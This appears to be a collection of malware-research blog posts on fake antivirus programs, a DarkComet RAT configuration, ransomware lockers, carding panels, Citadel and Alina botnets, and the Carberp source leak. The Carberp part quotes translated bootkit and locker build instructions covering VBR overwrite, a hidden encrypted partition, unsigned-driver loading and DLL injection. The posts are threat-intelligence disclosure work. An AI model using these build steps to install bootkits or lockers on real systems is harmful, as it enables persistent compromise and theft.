Quantcast
Channel: XyliBox
Viewing all 128 articles
Browse latest View live

System doctor 2014

$
0
0
System doctor 2014 is a fake anti-spyware tool. It displays fake alert messages, prevent execution of legit programs and detects inexistent infections to scare users.
It is a clone of System Care Antivirus, AVASoft Professional Antivirus, Disk Antivirus Professional, System Progressive Protection, Live Security Platinum, Smart Fortress 2012, Smart Protection 2012, Personal Shield Pro.

This one is multilanguage:

 Main windows:

Very funny broken language in French for example when you enter a bad serial:
"Vous avez entré un code d'enregistrement valide!"
English translation: You have entered a valid registration code!

To register (and help removal), copy paste this code: AF03E-DC96946D-23696B92-EF870D7C-67F6978A or AA39754E-715219C

 Psychedelic art:

Note for reverse engineers ~

• dns: 1 ›› ip: 95.211.229.159 - adresse: SYS-DOCTOR.COM

The file is named 'scarav' and install currently System Care Antivirus.

Payement processor for FakeAV:
smt-sps.com.tn/clicktopay/Avasoft/pay.aspx - 193.95.113.157
 The path is /Avasoft/

Canal Plus, poker and hacking

$
0
0
The 13 May Canal Plus (a french premium pay television channel) have broadcast a program "Foot, chevaux, poker: des paris sous influence"
During this story they interviewed a 'hacker' just before the subject, a voice-over do an introduction and say "il a conçu ce qu'on appelle un trojan ou troyen ou cheval de troie en jargon informatique"
You can translate simply this by "He created a trojan blablabla insert some random name for trojan here"
Then the 'hacker' show us Teamviewer with Darkcomet RAT:
As far as i know, Darkomet RAT is coded by DarkCoderSc, not this guys but well...


The 'hacker' tell us how he infect poker players: Youtube
A classic way: videos of fake applications to cheat on online poker rooms.

By searching the Youtube description on Google we have this:

And we got a profile:


Now if we search on google 'mediafire com/?skbb4ka77jp5act'
 We have another linked account:

This account have videos promoting a poker site 'francepokermedia.com'

And if we go on the forum, with no surprise:
An article about the Canal+ report (self-promotion hidden?)

Malwares are hosted on Mediafire servers, the 'hacker' have also do some blogspot like this one:

Some md5:
f8c5dd0f2c359adad2fd22a1ce902b35
a576c6a07852ef126ff2e918678ea54f
195a56821175d3c725dd3919282e0342
acb40e46b1582b5207b6addcf8c42a08

Let's take a file:

• dns: 1 ›› ip: 93.23.104.21 - adresse: HACKGS.NO-IP.ORG

Fynloski.A config:
#BEGIN DARKCOMET DATA --
MUTEX={DC_MUTEX-1XNQ69V}
SID={PokBot}
FWB={0}
NETDATA={hackgs.no-ip.org:1604|hackgs.no-ip.org:93|hackgs.no-ip.org:94}
GENCODE={0LGYVhtuCi4W}
INSTALL={1}
COMBOPATH={2}
EDTPATH={MSDCSC\WinUpdata.exe}
KEYNAME={WinUpdate}
EDTDATE={16/04/2007}
PERSINST={1}
MELT={1}
CHANGEDATE={1}
DIRATTRIB={6}
FILEATTRIB={6}
SH1={1}
CHIDEF={1}
CHIDED={1}
PERS={1}
OFFLINEK={1}
#EOF DARKCOMET DATA --

To the 'hacker':
Hidding in a hotel and using remote PC for Darkcomet don't make you anonymous, i know who you are since you are registered on some forums.
Canal plus:
If you're going to make a program and talk about hacking, then at least have a feel for the subject first.

Carding Manager

$
0
0
Carding Manager is a script made by a french to store CC Details, it was at first sell for 50$

But seem sales don't work, Peax reduced the price to 20$
 Anyway that the first time i see a manager for carder, this guys deserve a post.

• dns: 1 ›› ip: 209.190.85.27 - adresse: SULU.HTML-5.ME
Login:

Dashboard:

Cards:

Edit card:

Card infos:

Orders:

Edit order:

Order Infos:

Identity:

Edit identity:

Site manager:

Edit site:

View accounts:

Edit account:

The script isn't secure at all, but the interface is cool.

Trojan:Win32/Tobfy.M Affiliate

$
0
0
Came across a Tobfy sample today, things was interesting so here is a post.
I will skip the reversing part: i'm a bit bored to take 50 screenshots and go step by step about what's do the 'M' version of Tobfy. (this winlock is very primitive and relatively easy to understand)
So, let's go directly to the C&C part.

French landing when loaded (buggy IP retrieving, and geoloc):
• dns: 1 ›› ip: 91.226.212.174 - adresse: HKKPOGMPG.POLEXT-FREEHOST.RU
• dns: 1 ›› ip: 91.226.212.174 - adresse: AREKOV.COM


Login:
Registration:

News:

Statistics:

Checks:

Links/EXE (39090a097cfbe4ab766317e5f3d74b53):

Rules:

Affiliate stats:
(Ignore the 'admin' account, it's also made by me)

Affiliate Checks:


Some samples took from the server:
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2214&start=10#p19581

I'm a bit unaware about Tobfy but that the first time i see this one on affiliate system.

Trojan.Ransom

$
0
0


This trojan blocker ( MD5: b72a1ffd702f73080c7ab9ff26ba64ce, be1589b12b771ca6ba41b9e4c82ec9aa, d4a0afcc3471878014f4b64780245054 ) prevents all software execution.
To remove the Trojan (and unlock windows), infected users need to enter a valid serial number.


WebMoney: B208016071489
WebMoney: U264040669509
Phone: 988-185-37-42
Code to unlock windows: 2348

Russian text:
КОМПЬЮТЕР ЗАБЛОКИРОВАН!
Ваш компьютер заблокирован за просмотр, копирование и тиражирование
видеоматериалов, содержащих элементы порнографии, педофилии и насилия над детьми.
Для снятия блокировки Вам необходимо оплатить штраф в размере
600000 БЛ. рублей   в  WebMoney кошелек
B208016071489
 оплату штрафа можно произвести в любом платежном терминале.
В случае оплаты суммы равной штрафу либо превышающей ее на фискальном
чеке терминала будет напечатан код разблокировки. Его нужно ввести
в поле в нижней части окна и нажать кнопку "Enter". После снятия
блокировки Вы должны удалить все материалы содержащие элементы порнографии,
насилия и педофилии. Если в течение 12 часов штраф не будет оплачен, все данные
на Вашем персональном компьютере будут безвозвратно удалены, а дело
будет передано в суд для разбирательства по статье 343 ч.1 УК РБ.
В Н И М А Н И Е !
Перезагрузка или выключение компьютера приведет к незамедлительному
удалению ВСЕХ данных, включая код операционной системы и BIOS,
с невозможностью дальнейшего восстановления.

Статья 343.1. Изготовление и распространение порнографических материалов или предметов.
Изготовление либо хранение с целью распространения или рекламирования, либо распространение или
рекламирование порнографических материалов или печатных изданий, иных предметов порнографического
характера с изображением заведомо несовершеннолетнего, либо публичная демонстрация кино- или
видеофильмов порнографического содержания с таким изображением - наказываются исправительными
работами на срок до двух лет, или арестом на срок до шести месяцев, или ограничением свободы на срок
до четырех лет.

Note for reverse engineer:

Citadel lawsuit and explanation of John Doe 25

$
0
0
I was browsing the Zeus tracker in may, and a particular botnet got my attention.https://zeustracker.abuse.ch/monitor.php?host=angelescitypattaya.com
This Citadel botnet was targeting my country (France) and was hosted in... France.
So i gived a fuck.

C&C Login:

Files:

Report folder:
I've do the count and there is a total of 1142 folders.

Some screenshots found inside these folders, Mobile free:

BNP Parisbas:

Credit Agricole:

 Société générale:

LCL:

Crédit mutuel:

And when screenshots can't do the trick, hackers use video module, banque postale:

Someone administrating a POS (video grabbed form Citadel botnet):

Mairie de Neuilly compromised:
I've took care to transmit this botnet to banks and CERTs, few hours later it was shutdown.
But what's can we learn from this attack ?

Drop/Update:
angelescitypattaya.com/mimosa/file.php|file=mimosa.exe
angelescitypattaya.com/mimosa/welcome.php
angelescitypattaya.com/mimosa/file.php
angelescitypattaya.com/mimosa/file.php|file=config.dll
malkmalk.com/mimosa/file.php|file=config.dll
• dns: 1 ›› ip: 91.236.254.207 - adresse: ANGELESCITYPATTAYA.COM

• dns: 1 ›› ip: 82.165.37.26 - adresse: MALKMALK.COM
82.165.37.26:
ALLBE777.COM
CHECKIT-ONLINE-2.NET
DATINGSCAMMERSLIST.INFO
FNEU.NET
FOTOSBASES.INFO
FURCHALKAEPTI.NET
GAMEMARI.NET
GBAH.NET
GBVP.NET
GLAZSYSTEM.COM
GLAZSYSTEM.NET
GOOG-CHECK.NET
IBTL.NET
IIIFADKFJHABKLDFALK.NET
ILOVEBOSTON1974.COM
MALKMALK.COM
MGAB.NET
MIMTALK.COM
NEWSMETA.NET
PEUHIUYCA.COM
REEPTA.COM
SEOWINDOW.NET
SOMEONEINHAPPENS.COM
TUTUBEST.NET
TZFRM.COM
UNIKOMPOK.NET
VMHOSTINGBOXX.ORG
WEBANALYSES.COM
WEBSAMPLETODAY.COM
WIDELID.COM
ZIROCITY.COM
ZSBIZ.NET

Banks/sites targeted:
*.credit-agricole.fr
*societegenerale.fr
*secure.lcl.fr
voscomptesenligne.labanquepostale.fr
*bnpparibas.net
*mobile.free.fr
*banque-accord.fr
*creditmutuel.fr
*facebook.com

A list of antivirus sites and various help forums hijacked:
http://pastebin.com/ZFGb7wQG

After the shutdown the hacker behind have do another server this time wih the Botnet ID: caticlan
https://zeustracker.abuse.ch/monitor.php?host=rivascloviso.net
383 Folders (the server suffered of several shutdown)

I've asked a sample to Roman (abuse.ch) but unfortunately he got nothing for this domain.
Finaly a guys of a French CERT (you know who you are) shared me a MD5 of a sample.

Now, what the trouble with 'John Doe 25' ?
Microsoft Released later a lawsuit document against these guys, the botnet ID 'mimosa' and the Citadel key 'C1F20D2340B519056A7D89B7DF4B0FFF' who was targeting France match:

http://botnetlegalnotice.com/citadel/files/Summons_Does_1_82.pdf

 http://botnetlegalnotice.com/citadel/files/Compl_App_C.pdf

But no trace of 'caticlan' on the document.
That weird because they use exact same key and stuff:
Microsoft probably missed them.

angelescitypattaya.com was later sinkholed (Microsoft worked really hard on sinkholes, over 4k domains)
And about the login key 'C1F20D2340B519056A7D89B7DF4B0FFF'
This one is from a builder on a VPS, people pay access to the VPS and can build bots.
And this is also why we see botnets with no relations doing different things but all coming from the same builder.

For example we see this login key on 'test' botnet run by casual people:
Actors profile don't coincide with the Citadel key.

Citadel 1.3.5.1 Builder of John Doe 25 (C1F20D2340B519056A7D89B7DF4B0FFF).


Now having a look on the guys behind John Doe 25, who made all these builds:
 ladies and gentlemen... Citab.

Example of one of his French client 'CC-Dealer':
 Screenshot:
You can compare the builder infos badly blurred by this guys with my builder screenshot and it's the same.

Now let's have a look on other french guys who do Citadel service.
There is not a lot of people in France who do Citadel service but here is one of them i found interesting:
A guys who have the nick 'Dahou'

Demo of a Webinject on Crédit Agricole:

Work in progress:

Citadel service on another forum 'Hax0r':

I've a lot of information regarding others John Doe but i will avoid to disclose everything, and leave you on this fun image:

Oh and of couse, the guys behind this fail use the builder of Citab ;)

I've hesitate a long time before publishing this, finally i thought it would be interesting.

Who's behind Alina ?

$
0
0
Alina got a strange update this night, a 5.2 sample that i monitor received an update order for a 5.7 version (75F936A2385D2F26336D6F7410FD80DA)
Nothing really new on this just..:

Of course i don't infect a machine just to monitor Alina activities, i've made a primitive program who run on my VPS.
The app just send POST requests to the C&C like Alina do and grab the response, i do that as well for several others malwares.
It's the best way i've found for the moment to monitors stuff without compromissing a vm just for one malware.
Fun fact: Alina have various feature but i've always see 'Update and 'Download exe' feature used.

Various trash logs from Visual Studio found on the sample:

Maybe it's time
But not 'just' for SpiderLabs, also check out these awesome articles they have do if you want to understand how Alina work:
Alina: Casting a Shadow on POS
Alina: Following The Shadow Part 1
Alina: Following The Shadow Part 2
Because my last post start to be outdated for the actual version pushed by Alina actor(s)
Now for the C&C a new one was made for this update:

Still on the same server various other Alina C&C are or was on it:
I observed that some was moved and back later due to update or to counter brute force attacks, i have no idea..

Alina is also in relation with Citadel, for example the domain zwaonoiy.com got sinkholed.
hxxp://zwaonoiy.com/duck/admin.php
 http://botnetlegalnotice.com/citadel/files/Patel_Decl_Ex02.pdf

But what's mean 'dpt' and why ?
Probably a shortcut to a carding guys know as deputat:
Oh, and deputat: Liberty Reserve is dead, you should update that (just saying)

Who run... a dump shop
I have no idea if grabbed track2 finish inside, but running a POS malware with a dump shop behind is always a good conbination if you feel unable to withdraw money (and it's less risky)

Why did he started to go public with this? i've still no idea, but there is several rumors about a Alina guys that he plan to sell this publicly (according to darkode pm)

Login:

Dashboard:
11260 cards got grabbed but many duplicates just few are unique.
If you have read the part 2 of Spiderlabs, you see that Alina hooks itself to every process, that the reason of duplicates.

Logs:

Logs of one POS:

Settings:
Download/execute feature.

Show stats:
Update feature.

Show bins:
Why bins ?
Sometimes scrapping ram in research of track2 can produce random data, not credit cards.
A bin is the first 6 digits of a credit card, this export filter compare those bins to be sure it's a 'valid' credit card.
Most of POS malware who use the luhn algorithm have this problem: 00000000000000000 or 4444444444444444 who got grabbed because they are luhn valid.
a typical malware who do these false positive and probably the most know: mmon
Alina is one of the most advanced ram scrapper i've see for the moment.
Somone complaining about BlackPOS:


I've more details about why i think deputat is behind, just contact me.



Carberp archive

$
0
0
My first impression on the archive leak was "it's full of crap, where i should start"
And i was right about this, Okay Carberp source is leaked but 2Gb... what the final size of a carberp stub 700Mb ?
This archive contain really a lot of things who have nothing to do with Carberp like Zeus source code, Trusteer reports, RootkitUnhooker, UPX, openVPN, Stoned Bootkit, KonBoot, a leaked version of Citadel (lol?) and various others... (still entertaining)
This without speaking about all files generated by the IDE, (all useless .html, .obj, .idb, pdb...)
All useless double EXE files, 7z/rar/zip archives.
Those guys need to learn to organize their shit, the source code is the same chaotic mosaic.
On This archive Carberp is not the only thing who got leaked, there is also Mystic Compressor.

One of my first love (even if it's lame, i've unpacked really a lot of stuff packed with this)
Mystic commands: pack, register, unregister, copies, run, exec, test
MD5: c391deda94d4b6132a0420e104364c98
MD5: 564ffcdee65fc85d28828aacb5bf513d
MD5: 700f76b8d1c29d32c1d107d5fffe187b
MD5: e6ff5021ab01651407d7e9d7b6586863
I've always wondered who was behind Mystic and it's the first time i see the compressor.

To give you an overview of the AVs Detection on Mystic, here is a simple Hello world in assembler:

Without mystic: https://www.virustotal.com/en/file/5b3a24f86859ebb5856a5abd7c78bb5a819de7e1c1150f51b0f2fc6ff2fb4fad/analysis/1372161832/

With Mystic: https://www.virustotal.com/en/file/e46248776110c58f77da4a654db96ca1881028a91991712f5d61bd04cba87864/analysis/1372161816/

Some links about mystic compressor:
http://www.xylibox.com/2011/03/pornoplayer-ransomware-updated-mystic.html
http://blog.novirusthanks.org/2010/01/unpacking-mystic-compressor-used-to-pack-rogue-software/
http://siri-urz.blogspot.fr/2009/09/hidden-message-to-sunbelt-in-mystic.html

Stating the obviously main leak, Carberp builder:
2.3.1 - 2f143aa5c616a5e0995c9d68afc03d3e TS: 2013-01-21
2.2.1 - 8e2a2c2fe8e5165904a7934567e9b8f5 TS: 2013-01-30
2.1 - e158889586ec328ce1edbfe5ace72697 TS: 2013-01-02
1.0.3.3 - bf38f21f7787c54b4adc2b7484b71768 TS: 2012-12-25
1.0.0.0 - 949fff00b88a48ac1ebe03601b908468 TS: 2012-09-08

Builder of the first Carberp leak:
d57474d7df5ae5c823390a174111de5d TS: 2012:10:01

Config Builder:
ee00c34194898d739f77d0cd861efbc7 TS: 2012-08-17
9b125eecf8ef814f109182081dd2d8f1 TS: 2011-09-13
275d1983de8a313fc22db0c2f0a8dfe7 TS: 2012-08-17 *from the first leak*

Liberty Reserve inject (will be so useful now!):

On some forums, malware services already include Carberp:

And to finish some translations done by @Malwageddon
bootkit\readme.txt:
Бут-лоадер для драйверов
------------------------

Позволяет загружать специально собранные драйвера в момент старта ОС.
Драйвер загружается до инициализации ядра NT, а значит до старта PatchGuard.
Цифровая подпись драйвера не требуется.

Поддерживаются все ОС Windows, начиная с XP, и по 7 SP1, включительно.
Поддерживаются две архитектуры: x86 и AMD64 (EM64T).

Код лоадера метаморфный, состоит из некоторого кол-ва блоков, которые
перемешиваются в случайном порядке при каждой сборке проекта. Таким образом,
каждый свежесобраный лоадер бинарно отличен от предыдущего. В дальнейшем,
по желанию заказчика, можно доработать лоадер, добавив динамическое шифрование
и элементы полиморфизма.

Проект собирается с помощью MS Visual Studio 2005 и MS Windows XP DDK.
Cначала собирается под х86, затем под AMD64.


Состав проекта
--------------
  1. Генератор лоадера (\BkGen).
  2. Библиотека лоадера (\BkLib).
  3. Программа-установщик (\BkSetup).
  4. Библиотека-установщик (\SetupDll).
  5. Драйвер-инжектор (\KLoader).
  6. Утилита для прикрепления файлов(\FJ).
  7. Батники для сборки примерного установщика с примерами DLL (\BkBuild).


Генератор лоадера
-----------------
  Собирается только для х86 в исполняемый файл BkGen.exe
  При запуске создает файл VBR.COM содержащий метаморфный код загрузчика.
  При каждом запуске генерирует уникальный загрузчик.


Библиотека лоадера
------------------
  Собирается под х86 и под AMD64 в статическую библиотеку (.lib).
  Содержит функции, необходимые для установки и инициализации лоадера.
  Импортируется установщиком и драйвером. Подробнее см. файл bklib.h.


Программа-установщик
--------------------
  При сборке ищется файл лоадера VBR.COM и интегрируется в ресурсы.
  Собирается только под x86 в исполняемый файл BkSetup.exe.


Библиотека-установщик
---------------------
  Собирается под х86 и х64 в динамическую библиотеку SetupDll.dll
  Библиотека экспортирует одну функцию: ULONG BkInstall(VOID),
  при вызове которой, производится установка загрузчика в системе.
  В случае ошибки, функция возвращает код ошибки Win32.


Драйвер-инжектор
----------------
  Собирается под х86 и AMD64 как драйвер NT (kloader.sys).
  Инжектит прикрёпленные DLL в указаннае процессы. Список DLL и процессов
  задается файлом конфигурации для утилиты FJ. При загрузке сканирует папку
  \SystemRoot\RepSrc. Ищет в папке \SystemRoot и во всех подпапках файлы с
  такими же именами как те, которые найдены в \SystemRoot\RepSrc и заменяет их.


Утилита для прикрепления файлов
-------------------------------
  Собирается только под х86 в исполняемый файл FJ.EXE.
  Используется для присоединения инжектируемых DLL к файлу драйвера и для
  присоединения файла драйвера к инсталлеру. Подробнее см. \FJ\ReadMe.txt.


Батники для сборки примерного установщика
-----------------------------------------
  BkBuild.bat - собирает инсталлер с прикреплёнными к нему драйверами kloader.sys
                для х86 и amd64, соответственно. К каждому драйверу прикрепляются
                DLL для инжекта.
  BkSetup.cfg - конфигурационный файл для сборки инсталлера.
  kldr32.cfg  - конфигурационный файл для прикрепления DLL к 32х-битному драйверу.
  kldr64.cfg  - конфигурационный файл для прикрепления DLL к 64х-битному драйверу.
  demo32.dll  - 32х-битная демо-библиотека.
  demo64.dll  - 64х-битная демо-библиотека.


Порядок сборки
--------------
  1. При помощи Visual Studio 2005 собрать весь проект. Сначала собрать под i386,
     затем, под amd64.
  2. Открыть консоль (CMD.EXE), зайти в папку \BkBuild и запустить из консоли
     BkBuild.exe
  3. Забрать готовый установщик из папки \BkBuild\Release.
Translate:
Bootloader for the drivers
------------------------

Allows loading specially crafted drivers during Operating System start-up.
The driver is loaded before NT kernel initialization and before PatchGuard starts,
so it can patch any kernel code.
The driver is given control before any other drivers are loaded (including all
boot-load drivers), so it can monitor and interact with their loading process.
Digital signature for the driver is not required.

Supports all Windows OS, from XP to Windows 8 inclusive.
Supports 2 CPU architectures: x86 and AMD64 (EM64T).
Boot-loader is working under any NTFS types.

Assembled project has three major components:
- Initial Program Load (IPL);
- specially crafted driver that is loaded prior NT kernel;
- installation program (or installation library(DLL));

IPL code is metamorphic and consist of a number of blocks. During each project
compilation blocks are mixed in a random order.
IPL code is encrypted and dynamically decrypted only during execution.
Each newly compiled IPL code is different from the previous ones.
The driver is also encrypted when written to the disk and decrypted by IPL during
the start-up.

There is a size limit for the driver: due to the way IPL operates - the driver can't
be bigger than 100KB.

The project is compiled with MS Visual Studio 2005 and MS Windows 7 WDK.

Additional components
-------------------------

The driver may include the following additional components:

- Virtual File System Manager. Creates encrypted(RC6) virtual file system (VFS) in
unformatted disk area.
  Enables User-mode interface for working with the files stored in VFS.

- filters disk access. Blocks 'external' access to the sectors where IPL and VFS is
located. Hides VFS

- DLL injector. Allows process loading(injection) of DLLs stored on VFS or attached
to the file driver. Includes interface to manage injects in the user-mode.

- Driver loader. Enables interface for loading unsigned drivers.

- TCP/IP stack (including: ARP, ICMP, DNS). Allows BSD-socket network access for
drivers and user-mode applications.

Project components
--------------
  1. IPL generator(\BkGen).
  2. Loader library(\BkLib).
  3. Installation program(\BkSetup).
  4. Installation library(SetupDll).
  5. Injection driver(\KLoader).
  6. VFS library(\FsLib).
  7. Unsigned drivers loader library(\DrvLdr).
  8. Loader and VFS protection filter library(\BkFilter).
  9. File attachment utility(\FJ).
  10. VFS manager tool/interface(\VFS).
  11. Batch files for assembling a loader sample with sample DLLs (\BkBuild).

IPL Generator
-------------
  Assembles into an executable file BkGen.exe - works under x86 only
  Creates VBR.COM when started and includes metamorphic loader code.
  Unique loader is generated at each execution

Loader library
------------------
  Assembles into a static library(.lib) - works under x86 and AMD64
  Includes functions required for loader installation and initialization.
  Imported by the installer and the driver. See bklib.h for more details.

Installation program
--------------------
  Searches loader file - VBR.COM during compilation and integrates it into resources.
  Compiles into an executable file BkSetup.exe - works under x86 only

Installation library
---------------------
  Assembles into a library file SetupDll.dll - works under x86 and x64
  The library exports one function: ULONG BkInstall(BOOL bReboot).
  Calling this function performs loader installation.
  The function returns Win32 error code if any issues are encountered.

Injection driver
----------------
  Assembles into an NT driver (kloader.sys) - works under x86 and x64
  Injects attached DLLs into specified processes. The list of DLLs and processes is
specified in the configuration file for FJ utility.

VFS library
-------------------------
  Being linked into Injector Driver (kloader.sys) - works under x86 and x64
  Creates VFS in unformatted hard disk sectors.
  If no or insufficient unformatted disk space is found the size of the last
partition on the hard disk in decreased.
  VFS is a modified FAT16 partition. The cluster size is equal to the physical
sector size on the disk.
  VFS maximum size is ~32MB.
  Filenames are in 8.3 format. Long filenames are not supported. No catalogue support.
  VFS is fully encrypted with RC6.

Unsigned drivers loader library
-------------------------------------------
  Being linked into Injector Driver (kloader.sys) - works under x86 and x64
  Allows loading and execution of unsigned NT kernel drivers.

Loader and VFS protection filter library
-----------------------------------------------------------------
  Being linked into Injector Driver (kloader.sys) - works under x86 and x64
  Filters low-level disk read/write calls.
  Disables any modifications to the disk sectors where the loader is stored.
  Blocks any modifications by external applications and drivers to the disk sectors
hosting VFS.
  Returns zeros if anything 'external' attempts to read VFS - hiding it.
 
File attachment utility
-------------------------------
  Assembles into an executable file FJ.EXE - works under x86 only
  Used for attaching injectable DLLs to the driver file and for attaching the driver
file to the installer.
  See \FJ\ReadMe.txt for more details.

Batch files for assembling a loader sample with sample DLLs (\BkBuild).
-----------------------------------------
  BkBuild.bat - assembles the installer with attached drivers kloader.sys - for x86
and amd64 accordingly. Each driver is attached a DLL for injection.
  BkSetup.cfg - configuration file for assembling the installation program and
attaching the drivers to it.
  setupdll.cfg- configuration file for assembling the installation library and
attaching the drivers to it.
  demo32.dll  - 32bit demo library
  demo64.dll  - 64bit demo library

Assembly order
--------------
  1. Using Visual Studio 2005 compile the entire project. Compile for i386 first and
then for amd64.
  2. Open the console(CMD.EXE). Go to \BkBuild folder and start BkBuild.exe
  3. Take the compiled loader from \BkBuild\Release folder.

bootkit.old\readme2.txt:
Установка загрузчика
-----------------
1. Инсталлер анализирует жесткий диск (\??\PHYSICALDRIVEx): проверяется таблица разделов,
 рассчитываются размеры неиспользованного пространства перед первым и после последнего раздела.
2. При наличии неиспользованной области достаточного размера в неё записывается код
 драйвера.
3. Инсталлер читает код VBR (Volume Boot Record), находящийся в первых
 15 секторах загрузочного раздела (\Device\HarddiskХ\PartitionХ).
4. Код VBR сжимается, к нему дописывается загрузчик так, чтобы при старте VBR получить
 управление.
5. Новый код VBR, включающий загрузчит, запиывается на место старого кода VBR.

OC Win7 запрещает запись в сектора диска, принадлежащие тому файловой системы.
 Тем не менее, Win7 всегда имеет пустой участок размером ~1МБ перед первым
 разделом диска. Для XP и Vista, в случае отстутсвия неиспользованного пространства,
 возможна запись кода драйвера в последние сектора последнего раздела.
Чтение и запись секторов диска производится путем открытия устройства \??\PHYSICALDRIVEx, с
 использованием нативных функций NT: NtCreateFile, NtReadFile, NtWriteFile.

Таким образом, чтобы гарантировать корректную установку загрузчика и драйвера необходимо:
1. Наличие прав администратора, а для OC Vista и Win7, также,
 наличие повышенных привелегий (UAC).
2. Наличие возможности беспрепятственно открывать, производить чтение и запись устройств
 \??\PHYSICALDRIVEx и \Device\HarddiskХ\PartitionХ



FAQ


> так же меня интерисуют где хранится будут мои дллки которые инжектятся в процесс ?

В последних секторах системного тома.

> если винду снесут,руткит + мои длл останутся?

Нет, не останутся.
Мало кто может пережить переустановку систему.
Сделать такое можно, но будет дорого и я не уверен, что это нужно.

> и буткит ты рассказывал там какойто крутой метод ?
> тобишь запись не в mbr , а чтото другое,приватное опиши плиз подробнее.

Вкратце, у нас внедрение не в MBR, а в загрузочные файлы системы.
Translate:
Loader setup
-----------------
1. The installer analyses the hard disk (\??\PHYSICALDRIVEx): checks partition table,
   calculates the size of unused space before the first partition and after the last one
2. If found a big enough area - the driver code is written into it.
3. The installer reads VBR (Volume Boot Record) code that is located in the first 15 sectors of the boot partition (\Device\HarddiskÕ\PartitionÕ).
4. VBR code is compressed and the loader is added to it, so that when VBR is started it gets the control.
5. The new VBR code that includes the loader overwrites the old VBR code.

Windows 7 disables writing into file system volume sectors on the hard disk, but
it always has ~1MB of unused space before the first partition.
For XP and Vista, if no unused space is found it's possible to use the last sectors of the last partition to store the driver's code.
Hard disk sectors are read and written by opening \??\PHYSICALDRIVEx device using native NT functions: NtCreateFile, NtReadFile, NtWriteFile.

The loader and the driver will be guaranteed to install successfully under the following conditions:
1. operation is performed with admin rights. Also, for Vista and Win7 elevated UAC rights are required.
2. Unrestricted access to open, read and write to the following devices
 \??\PHYSICALDRIVEx è \Device\HarddiskÕ\PartitionÕ

FAQ


> where will my DLLs that are injected into processes be stored?

The last sectors of the system volume.

>if Windows is reinstalled will the rootkit and my DLLs survive?

No, will not survive.
Not many kits can survive Operating System reinstall.
I'm sure it's doable, but it'll substantially increase the cost and I’m not sure it's really required.

> and you were saying there is some really cool method for bootkit?
> like, not using MBR, but something else... could you give more details please?

Simply saying, we do not use MBR, we use OS boot files.

DllLoaderHook\readme.txt:
DLL которую нужно запустить необходимо положить в папку In под именем
in.dll. В этой dll должна быть функция start (все буквы маленькие), она
должна быть определена следующим образом:
start(char* exe, int admin)
где exe полный путь к ехе файлу через который была запущена dll
admin - 0 - админских прав нет и они не были получены, 1 - админские права уже были,
        2 - админских прав не было, но они были были насильно получены.

Для формирования ехе необходимо полностью перекомпилировать проект (ребилд), и конечный
результат будет в папке release.
сейчас в папке release лежит ехе в который вшита длл для авторана через планировщик
задач, но такой авторан срабатывает только при админских правах.
Translate:
Copy the DLL you wish to execute into a folder 'In' and rename it to 'in.dll'
The DLL has to have a function called 'start'(all lowercase). The function has to be defined in the following format:
start(char* exe, int admin)
where 'exe' is the full path to the file the DLL was executed with
admin - 0 - no admin rights and it wasn't possible to obtain them
        1 - already has admin rights
        2 - no admin rights, but were successfully forced to obtain

The entire project has to be re-build in order to create the 'exe' file. The end result will be in 'release' folder.
The current 'exe' file in the 'release' folder has embedded autorun DLL that uses Task Scheduler - this autorun will work only with admin rights

\Locker\build\Readme.txt:
Структура папки билда:

- Tools - утилиты для упаковки
  - WhiteJoeBuild.exe - для встраивания строк в dll и dll в exe
  - mystic.exe - криптор для финального файла ring3 версии
  - builder.exe - GUI к WhiteJoeBuild.exe для встраивания строк URLs в locker.dll
 
- SrcDir - папка для исходных файлов процесса билда.
  Должна содержать:
  - locker.dll - рабочая ДЛЛ как для BootKit, так и для Ring3 версии
  - locker.exe - ring3 версия Locker. В нее встраивается locker.dll.wjb_out и он
    умеет ее разворачивать в памяти.

- OutDir - папка для результатов. При старте билда полностью очищается.
  Сюда ложатся результаты билда:
  - bootkit-locker.dll - файл для BootKit с вшитыми строками
  - ring3-locker.exe - файл ring3 версии с вшитой bootkit-locker.dll
  - mystic-ring3-locker.exe - обработанный Mystic.exe файл ring3-locker.exe
  
  
RunBuild.bat - файл запуска процесса билда.

Описание работы с системой билда:
- запустить RunBuild.bat

- он в свою очередь запускает Tools\builder.exe,в которой надо:
  - ввести список URL через пробел
  - ввести суффикс, который будет добавляться к каждой URL
  - нажать "готово" для вшивания
  - нажать "Cancel" для завершения работы
 
- процесс билда после этого должен продолжится.
- после битлда закрыть CMD окно можно нажатием на Enter.

Результирующие файлы будут в OutDir
Translate:
Builder folder structure:

- Tools - packaging utilities
  - WhiteJoeBuild.exe - used for inserting strings into DLLs and DLLs into EXEs
  - mystic.exe - cryptor for the final file 'ring3' version 
  - builder.exe - WhiteJoeBuild.exe GUI for inserting URL strings into locker.dll
 
- SrcDir - source files folder for builder process.
  Has to contain:
  - locker.dll - working DLL for the BootKit and for Ring3 version
  - locker.exe - ring3 version of the Locker. locker.dll.wjb_out goes into it - extracts the Locker into the memory.

- OutDir - Results folder. Content of the folder is cleared at each start of the build process.
  Build results are stored here:
  - bootkit-locker.dll - BootKit file with embedded strings
  - ring3-locker.exe - ring3 version file with embedded bootkit-locker.dll
  - mystic-ring3-locker.exe - processed by Mystic.exe 'ring3-locker.exe' file
  
  
RunBuild.bat - batch file to start the build process.

How to make a new build:
- run RunBuild.bat

- the batch file will execute Tools\builder.exe and you'll be prompted to supply the following data:
  - enter the list of URL separated by 'spaces'
  - enter URL suffix that will be added to each URL
  - click "ãîòîâî" button to complete embedding
  - click "Cancel" to finish the process
 
- the build process will continue after this.
- once the build is finished press 'Enter' to close the CMD console.

All the built files can be found in OutDir folder

Locker\build\Tools\builder.exe:

DllLoaderHook\Release\readme.txt:
формирование ехе:
builder.exe my.dll output.exe
где - my.dll - твоя длл, output.exe - конечный файл

schtasks.dll - установка авторана через планировщик задач

твоя dll должна иметь функцию

int start(char* exe, int admin)

exe - мой ехе для установки в автозапуске
admin - 0 - прав админских нет, 1 - ехе был запущен при админских правах,
        2 - ехе силой получил админские права
функция start должна возвращать 1 - авторан прошел успешно, 0 - авторан сделать не удалось
моя прога в дебаг запишет результат
Translate:
creating ехе:
builder.exe my.dll output.exe
where - my.dll - your DLL, output.exe - result file

schtasks.dll - sets autorun through Task Scheduler

your DLL has to have the following function

int start(char* exe, int admin)

exe - my 'ехе' to be setup to autorun
admin - 0 - no admin rights, 1 - 'åõå' was started with admin rights,
        2 - ехе successfully forced to obtain the admin rights
the function has to return 1 - autorun completed successfully, 0 - autorun failed
my program will save the results into debug log

I've not really looked at the Carberp source without ending with a headache.
It's more fun to watch the 'information wars' about Carberp code on twitter :)
HS: Peter Kleissner got the idea to group the more interesting content: http://blog.virustracker.info/?p=276

